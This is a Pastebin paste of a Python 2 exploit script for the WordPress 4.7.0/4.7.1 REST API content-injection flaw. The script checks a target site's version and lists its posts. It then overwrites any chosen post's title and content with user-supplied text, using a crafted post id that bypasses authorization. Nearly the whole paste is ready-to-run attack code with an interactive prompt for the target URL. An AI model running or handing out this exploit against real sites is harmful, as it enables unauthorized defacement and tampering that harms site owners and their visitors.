SHARE
TWEET

Wordpress content injection exploit by snoww0lf

choirurrizal Mar 2nd, 2017 430 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! /usr/bin/env python
  2.  
  3. """
  4. Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  5. REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
  6. Wordpress Version Affected: 4.7.0/4.7.1
  7. 2017 - Coded by snoww0lf.
  8. """
  9. import re
  10. import json
  11. import urllib2
  12.  
  13. class WpContent:
  14.     def __init__(self, url):
  15.         self.__url = url
  16.         self.__response = urllib2.urlopen(self.__url).read()
  17.  
  18.     def get_api_wp(self):
  19.         return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]
  20.  
  21.     def get_wp_version(self):
  22.         check_version = re.findall(r'ver=(.*)"', self.__response)[0]
  23.         if check_version == "4.7" or check_version == "4.7.1":
  24.             check_version += " ( Maybe vulnerable to inject ) "
  25.         else:
  26.             check_version += " ( Maybe not vulnerable to inject ) "
  27.         return check_version
  28.  
  29.     def get_wp_post_information(self):
  30.         get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
  31.         load_info = json.loads(get_post)
  32.         collected_information = ""
  33.         for load in load_info:
  34.             collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
  35.             format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
  36.         return collected_information
  37.  
  38.     def inject_content(self, id_content, title, content):
  39.         data = json.dumps({
  40.             'title':title,
  41.             'content':content
  42.             })
  43.         params = {'Content-Type':'application/json'}
  44.         full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
  45.         req = urllib2.Request(full_url, data, params)
  46.         resp = urllib2.urlopen(req).read()
  47.         return resp
  48.  
  49. def main():
  50.     print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
  51.     while True:
  52.         url = raw_input("[x] Enter the URL: ")
  53.         print("[?] Please wait ...\n")
  54.         wpcontent = WpContent(url)
  55.         wp_version = wpcontent.get_wp_version().split()[0]
  56.         print("[x] Wordpress Version: {0} ".format(wp_version))
  57.         if(wp_version == "4.7" or wp_version == "4.7.1"):
  58.             select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
  59.             while(select != "y" and select != "n"):
  60.                 print("[x] Wrong selection! Try again.")
  61.                 select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
  62.             print("\n")
  63.             if(select == "y"):
  64.                 print("[x] Parsing data information, please wait ...\n")
  65.                 wp_information = wpcontent.get_wp_post_information()
  66.                 print(wp_information)
  67.                 inp_id = input("[x] Enter ID Content that you want to overwrite: ")
  68.                 inp_title = raw_input("[x] Change title: ")
  69.                 print("\n")
  70.                 print("=> 1. Load data from file.")
  71.                 print("=> 2. Input data.")
  72.                 print("\n")
  73.                 mode = input("[x] Change content by [1/2] ? ")
  74.                 if mode == 1:
  75.                     dfile = raw_input("[x] Enter the filename: ")
  76.                     with open(dfile, 'r') as f:
  77.                         readf = f.readlines()
  78.                     print("[x] Exploit in progress ...\n")
  79.                     wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
  80.                 else:
  81.                     inp_data = raw_input("[?] Input data: ")
  82.                     print("[x] Exploit in progress ...\n")
  83.                     wpcontent.inject_content(inp_id, inp_title, inp_data)
  84.                 print("[x] Update success!\n")
  85.                 cont = raw_input("[?] Continue ? [y/n] ").lower()
  86.                 while(cont != "y" and cont != "n"):
  87.                     print("[x] Wrong selection! Try again.")
  88.                     cont = raw_input("[?] Continue ? [y/n] ").lower()
  89.                 if cont == "n": break
  90.             else:
  91.                 break
  92.         else:
  93.             cont = raw_input("[?] Continue ? ").lower()
  94.             while(cont != "y" and cont != "n"):
  95.                 print("[x] Wrong selection! Try again.")
  96.                 cont = raw_input("[?] Continue ? ").lower()
  97.             if cont == "n": break
  98.  
  99. if __name__ == '__main__':
  100. main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top